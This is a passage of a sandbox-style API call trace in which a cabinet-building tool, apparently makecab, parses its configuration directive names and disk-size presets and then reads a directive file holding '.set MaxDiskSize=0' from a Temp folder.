-1 [0254.497] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DiskLabelTemplate") returned -1 [0254.497] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DiskLabelTemplate") returned -1 [0254.497] _strcmpi (_Str1="ChecksumWidth", _Str2="DiskLabelTemplate") returned -1 [0254.497] _strcmpi (_Str1="ClusterSize", _Str2="DiskLabelTemplate") returned -1 [0254.497] _strcmpi (_Str1="Compress", _Str2="DiskLabelTemplate") returned -1 [0254.497] _strcmpi (_Str1="LongSourceFileNames", _Str2="DiskLabelTemplate") returned 8 [0254.498] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DiskLabelTemplate") returned -1 [0254.498] _strcmpi (_Str1="CompressionType", _Str2="DiskLabelTemplate") returned -1 [0254.498] _strcmpi (_Str1="CompressionLevel", _Str2="DiskLabelTemplate") returned -1 [0254.498] _strcmpi (_Str1="CompressionMemory", _Str2="DiskLabelTemplate") returned -1 [0254.498] _strcmpi (_Str1="DestinationDir", _Str2="DiskLabelTemplate") returned -4 [0254.498] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DiskLabelTemplate") returned -8 [0254.498] atoi (_Str="1") returned 1 [0254.498] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="DiskLabelTemplate") returned 17 [0254.498] atoi (_Str="1") returned 1 [0254.498] _strcmpi (_Str1="Cabinet", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="CabinetNameTemplate", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="ChecksumWidth", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="ClusterSize", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="Compress", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="LongSourceFileNames", _Str2="DoNotCopyFiles") returned 8 [0254.498] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="CompressionType", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="CompressionLevel", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="CompressionMemory", _Str2="DoNotCopyFiles") returned -1 [0254.498] _strcmpi (_Str1="DestinationDir", _Str2="DoNotCopyFiles") returned -10 [0254.498] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="DoNotCopyFiles") returned -6 [0254.498] _strcmpi (_Str1="DiskLabelTemplate", _Str2="DoNotCopyFiles") returned -6 [0254.498] atoi (_Str="1") returned 1 [0254.498] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="DoNotCopyFiles") returned 14 [0254.499] atoi (_Str="1") returned 1 [0254.499] _strcmpi (_Str1="Cabinet", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="CabinetNameTemplate", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="ChecksumWidth", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="ClusterSize", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="Compress", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="LongSourceFileNames", _Str2="FolderFileCountThreshold") returned 6 [0254.499] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="CompressionType", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="CompressionLevel", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="CompressionMemory", _Str2="FolderFileCountThreshold") returned -3 [0254.499] _strcmpi (_Str1="DestinationDir", _Str2="FolderFileCountThreshold") returned -2 [0254.499] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="FolderFileCountThreshold") returned -2 [0254.499] _strcmpi (_Str1="DiskLabelTemplate", _Str2="FolderFileCountThreshold") returned -2 [0254.499] _strcmpi (_Str1="DoNotCopyFiles", _Str2="FolderFileCountThreshold") returned -2 [0254.499] atoi (_Str="1") returned 1 [0254.499] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="FolderFileCountThreshold") returned 24 [0254.499] atoi (_Str="1") returned 1 [0254.499] _strcmpi (_Str1="Cabinet", _Str2="FolderSizeThreshold") returned -3 [0254.499] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="CabinetNameTemplate", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="ChecksumWidth", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="ClusterSize", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="Compress", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="LongSourceFileNames", _Str2="FolderSizeThreshold") returned 6 [0254.500] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="CompressionType", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="CompressionLevel", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="CompressionMemory", _Str2="FolderSizeThreshold") returned -3 [0254.500] _strcmpi (_Str1="DestinationDir", _Str2="FolderSizeThreshold") returned -2 [0254.500] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="FolderSizeThreshold") returned -2 [0254.500] _strcmpi (_Str1="DiskLabelTemplate", _Str2="FolderSizeThreshold") returned -2 [0254.500] _strcmpi (_Str1="DoNotCopyFiles", _Str2="FolderSizeThreshold") returned -2 [0254.500] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="FolderSizeThreshold") returned -13 [0254.500] atoi (_Str="1") returned 1 [0254.500] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="FolderSizeThreshold") returned 19 [0254.500] atoi (_Str="1") returned 1 [0254.500] _strcmpi (_Str1="Cabinet", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="CabinetNameTemplate", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="ChecksumWidth", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="ClusterSize", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="Compress", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="LongSourceFileNames", _Str2="GenerateInf") returned 5 [0254.500] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="GenerateInf") returned -4 [0254.500] _strcmpi (_Str1="CompressionType", _Str2="GenerateInf") returned -4 [0254.501] _strcmpi (_Str1="CompressionLevel", _Str2="GenerateInf") returned -4 [0254.501] _strcmpi (_Str1="CompressionMemory", _Str2="GenerateInf") returned -4 [0254.501] _strcmpi (_Str1="DestinationDir", _Str2="GenerateInf") returned -3 [0254.501] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="GenerateInf") returned -3 [0254.501] _strcmpi (_Str1="DiskLabelTemplate", _Str2="GenerateInf") returned -3 [0254.501] _strcmpi (_Str1="DoNotCopyFiles", _Str2="GenerateInf") returned -3 [0254.501] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="GenerateInf") returned -1 [0254.501] _strcmpi (_Str1="FolderSizeThreshold", _Str2="GenerateInf") returned -1 [0254.501] atoi (_Str="1") returned 1 [0254.501] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="GenerateInf") returned 11 [0254.501] atoi (_Str="1") returned 1 [0254.501] _strcmpi (_Str1="1", _Str2="No") returned -61 [0254.501] _strcmpi (_Str1="1", _Str2="Off") returned -62 [0254.501] _strcmpi (_Str1="1", _Str2="False") returned -53 [0254.501] _strcmpi (_Str1="Cabinet", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="ClusterSize", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="Compress", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCabinetHeader") returned 3 [0254.501] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="CompressionType", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="CompressionLevel", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="CompressionMemory", _Str2="InfCabinetHeader") returned -6 [0254.501] _strcmpi (_Str1="DestinationDir", _Str2="InfCabinetHeader") returned -5 [0254.502] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCabinetHeader") returned -5 [0254.502] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCabinetHeader") returned -5 [0254.502] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCabinetHeader") returned -5 [0254.502] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCabinetHeader") returned -3 [0254.502] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCabinetHeader") returned -3 [0254.502] _strcmpi (_Str1="GenerateInf", _Str2="InfCabinetHeader") returned -2 [0254.502] atoi (_Str="1") returned 1 [0254.502] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfCabinetHeader") returned 16 [0254.502] atoi (_Str="1") returned 1 [0254.502] _strcmpi (_Str1="Cabinet", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="ClusterSize", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="Compress", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCabinetLineFormat") returned 3 [0254.502] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="CompressionType", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="CompressionLevel", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="CompressionMemory", _Str2="InfCabinetLineFormat") returned -6 [0254.502] _strcmpi (_Str1="DestinationDir", _Str2="InfCabinetLineFormat") returned -5 [0254.502] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.502] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCabinetLineFormat") returned -5 [0254.502] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCabinetLineFormat") returned -5 [0254.502] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.502] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCabinetLineFormat") returned -3 [0254.503] _strcmpi (_Str1="GenerateInf", _Str2="InfCabinetLineFormat") returned -2 [0254.503] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCabinetLineFormat") returned -4 [0254.503] atoi (_Str="1") returned 1 [0254.503] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfCabinetLineFormat") returned 20 [0254.503] atoi (_Str="1") returned 1 [0254.503] _strcmpi (_Str1="Cabinet", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="ChecksumWidth", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="ClusterSize", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="Compress", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfCommentString") returned 3 [0254.503] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="CompressionType", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="CompressionLevel", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="CompressionMemory", _Str2="InfCommentString") returned -6 [0254.503] _strcmpi (_Str1="DestinationDir", _Str2="InfCommentString") returned -5 [0254.503] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfCommentString") returned -5 [0254.503] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfCommentString") returned -5 [0254.503] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfCommentString") returned -5 [0254.503] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfCommentString") returned -3 [0254.503] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfCommentString") returned -3 [0254.503] _strcmpi (_Str1="GenerateInf", _Str2="InfCommentString") returned -2 [0254.504] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfCommentString") returned -14 [0254.504] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfCommentString") returned -14 [0254.504] atoi (_Str="1") returned 1 [0254.504] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfCommentString") returned 16 [0254.504] atoi (_Str="1") returned 1 [0254.504] _strcmpi (_Str1="Cabinet", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="ClusterSize", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="Compress", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDateFormat") returned 3 [0254.504] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="CompressionType", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="CompressionLevel", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="CompressionMemory", _Str2="InfDateFormat") returned -6 [0254.504] _strcmpi (_Str1="DestinationDir", _Str2="InfDateFormat") returned -5 [0254.504] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDateFormat") returned -5 [0254.504] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDateFormat") returned -5 [0254.504] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDateFormat") returned -5 [0254.504] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDateFormat") returned -3 [0254.504] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDateFormat") returned -3 [0254.504] _strcmpi (_Str1="GenerateInf", _Str2="InfDateFormat") returned -2 [0254.504] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfDateFormat") returned -1 [0254.504] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfDateFormat") returned -1 [0254.504] _strcmpi (_Str1="InfCommentString", _Str2="InfDateFormat") returned -1 [0254.505] atoi (_Str="1") returned 1 [0254.505] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfDateFormat") returned 13 [0254.505] atoi (_Str="1") returned 1 [0254.505] _strcmpi (_Str1="mm/dd/yy", _Str2="mm/dd/yy") returned 0 [0254.505] _strcmpi (_Str1="Cabinet", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="ChecksumWidth", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="ClusterSize", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="Compress", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfDiskHeader") returned 3 [0254.505] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="CompressionType", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="CompressionLevel", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="CompressionMemory", _Str2="InfDiskHeader") returned -6 [0254.505] _strcmpi (_Str1="DestinationDir", _Str2="InfDiskHeader") returned -5 [0254.505] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfDiskHeader") returned -5 [0254.505] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfDiskHeader") returned -5 [0254.505] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfDiskHeader") returned -5 [0254.505] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfDiskHeader") returned -3 [0254.505] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfDiskHeader") returned -3 [0254.505] _strcmpi (_Str1="GenerateInf", _Str2="InfDiskHeader") returned -2 [0254.505] atoi (_Str="1") returned 1 [0254.505] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfDiskHeader") returned 13 [0254.505] atoi (_Str="1") returned 1 [0254.506] atoi (_Str="1") returned 1 [0254.506] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfDiskLineFormat") returned 17 [0254.506] atoi (_Str="1") returned 1 [0254.506] atoi (_Str="1") returned 1 [0254.507] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFileHeader") returned 13 [0254.507] atoi (_Str="1") returned 1 [0254.507] atoi (_Str="1") returned 1 [0254.507] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFileLineFormat") returned 17 [0254.507] atoi (_Str="1") returned 1 [0254.507] atoi (_Str="1") returned 1 [0254.507] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFileName") returned 11 [0254.507] atoi (_Str="1") returned 1 [0254.508] atoi (_Str="1") returned 1 [0254.508] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFooter") returned 9 [0254.508] atoi (_Str="1") returned 1 [0254.508] atoi (_Str="1") returned 1 [0254.508] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFooter1") returned 10 [0254.508] atoi (_Str="1") returned 1 [0254.508] atoi (_Str="1") returned 1 [0254.508] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFooter2") returned 10 [0254.508] atoi (_Str="1") returned 1 [0254.508] atoi (_Str="1") returned 1 [0254.508] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFooter3") returned 10 [0254.508] atoi (_Str="1") returned 1 [0254.509] atoi (_Str="1") returned 1 [0254.509] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfFooter4") returned 10 [0254.509] atoi (_Str="1") returned 1 [0254.509] atoi (_Str="1") returned 1 [0254.509] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader") returned 9 [0254.509] atoi (_Str="1") returned 1 [0254.509] atoi (_Str="1") returned 1 [0254.509] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader1") returned 10 [0254.509] atoi (_Str="1") returned 1 [0254.509] atoi (_Str="1") returned 1 [0254.510] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader2") returned 10 [0254.510] atoi (_Str="1") returned 1 [0254.510] atoi (_Str="1") returned 1 [0254.510] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader3") returned 10 [0254.510] atoi (_Str="1") returned 1 [0254.510] atoi (_Str="1") returned 1 [0254.510] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader4") returned 10 [0254.510] atoi (_Str="1") returned 1 [0254.510] atoi (_Str="1") returned 1 [0254.510] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader5") returned 10 [0254.510] atoi (_Str="1") returned 1 [0254.511] atoi (_Str="1") returned 1 [0254.511] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfHeader6") returned 10 [0254.511] atoi (_Str="1") returned 1 [0254.511] atoi (_Str="1") returned 1 [0254.511] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="InfSectionOrder") returned 15 [0254.511] atoi (_Str="1") returned 1 [0254.511] atoi (_Str="1") returned 1 [0254.511] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="MaxCabinetSize") returned 14 [0254.511] atoi (_Str="1") returned 1 [0254.511] atoi (_Str="1") returned 1 [0254.512] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="MaxDiskFileCount") returned 16 [0254.512] atoi (_Str="1") returned 1 [0254.512] _strcmpi (_Str1="224", _Str2="360K") returned -1 [0254.512] atol (_Str="362496") returned 362496 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="720K") returned -5 [0254.512] atol (_Str="730112") returned 730112 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="1.2M") returned 1 [0254.512] atol (_Str="1213952") returned 1213952 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="1.25M") returned 1 [0254.512] atol (_Str="1250304") returned 1250304 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="1.44M") returned 1 [0254.512] atol (_Str="1457664") returned 1457664 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="1.68M") returned 1 [0254.512] atol (_Str="1716224") returned 1716224 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="DMF168") returned -50 [0254.512] atol (_Str="1716224") returned 1716224 [0254.512] atol (_Str="224") returned 224 [0254.512] _strcmpi (_Str1="224", _Str2="CDROM") returned -49 [0254.512] atol (_Str="681984000") returned 681984000 [0254.512] atol (_Str="224") returned 224 [0254.512] atoi (_Str="1") returned 1 [0254.512] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="MaxDiskSize") returned 11 [0254.512] atoi (_Str="1") returned 1 [0254.513] _strcmpi (_Str1="1457664", _Str2="360K") returned -2 [0254.513] atol (_Str="362496") returned 362496 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] _strcmpi (_Str1="1457664", _Str2="720K") returned -6 [0254.513] atol (_Str="730112") returned 730112 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] _strcmpi (_Str1="1457664", _Str2="1.2M") returned 6 [0254.513] atol (_Str="1213952") returned 1213952 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] _strcmpi (_Str1="1457664", _Str2="1.25M") returned 6 [0254.513] atol (_Str="1250304") returned 1250304 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] _strcmpi (_Str1="1457664", _Str2="1.44M") returned 6 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] atol (_Str="1457664") returned 1457664 [0254.513] atoi (_Str="1") returned 1 [0254.513] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="MaxErrors") returned 9 [0254.513] atoi (_Str="1") returned 1 [0254.513] atoi (_Str="1") returned 1 [0254.513] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="ReservePerCabinetSize") returned 21 [0254.513] atoi (_Str="1") returned 1 [0254.513] atoi (_Str="1") returned 1 [0254.514] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="ReservePerDataBlockSize") returned 23 [0254.514] atoi (_Str="1") returned 1 [0254.514] atoi (_Str="1") returned 1 [0254.514] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="ReservePerFolderSize") returned 20 [0254.514] atoi (_Str="1") returned 1 [0254.514] atoi (_Str="1") returned 1 [0254.514] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="RptFileName") returned 11 [0254.514] atoi (_Str="1") returned 1 [0254.514] atoi (_Str="1") returned 1 [0254.514] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="SourceDir") returned 9 [0254.514] atoi (_Str="1") returned 1 [0254.514] atoi (_Str="1") returned 1 [0254.514] _vsnprintf (in: _DstBuf=0x27e87feda0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed08 | out: _DstBuf="UniqueFiles") returned 11 [0254.515] atoi (_Str="1") returned 1 [0254.515] _strcmpi (_Str1="1", _Str2="No") returned -61 [0254.515] _strcmpi (_Str1="1", _Str2="Off") returned -62 [0254.515] _strcmpi (_Str1="1", _Str2="False") returned -53 [0254.515] _open (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\1A70.bin" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\1a70.bin"), _OpenFlag=32768) returned 3 [0254.515] _read (in: _FileHandle=3, _DstBuf=0x27e87ff2f0, _MaxCharCount=0x3 | out: _DstBuf=0x27e87ff2f0*) returned 3 [0254.515] _lseek (_FileHandle=3, _Offset=0, _Origin=0) returned 0 [0254.515] _read (in: _FileHandle=3, _DstBuf=0x27e8c1b390, _MaxCharCount=0x1000 | out: _DstBuf=0x27e8c1b390*) returned 156 [0254.516] strpbrk (_Str=".set MaxDiskSize=0", _Control=" \x09") returned=" MaxDiskSize=0" [0254.516] strspn (_Str=" MaxDiskSize=0", _Control=" \x09") returned 0x1 [0254.516] strpbrk (_Str="MaxDiskSize=0", _Control=" \x09") returned 0x0 [0254.516] strspn (_Str=".set MaxDiskSize=0", _Control=" \x09") returned 0x0 [0254.516] strspn (_Str=".set MaxDiskSize=0", _Control=" \x09") returned 0x0 [0254.516] strpbrk (_Str="set MaxDiskSize=0", _Control=" \x09") returned=" MaxDiskSize=0" [0254.516] _strcmpi (_Str1="Define", _Str2="set") returned -15 [0254.516] _strcmpi (_Str1="Delete", _Str2="set") returned -15 [0254.516] _strcmpi (_Str1="Dump", _Str2="set") returned -15 [0254.516] _strcmpi (_Str1="InfBegin", _Str2="set") returned -10 [0254.516] _strcmpi (_Str1="InfEnd", _Str2="set") returned -10 [0254.516] _strcmpi (_Str1="InfWrite", _Str2="set") returned -10 [0254.516] _strcmpi (_Str1="InfWriteCabinet", _Str2="set") returned -10 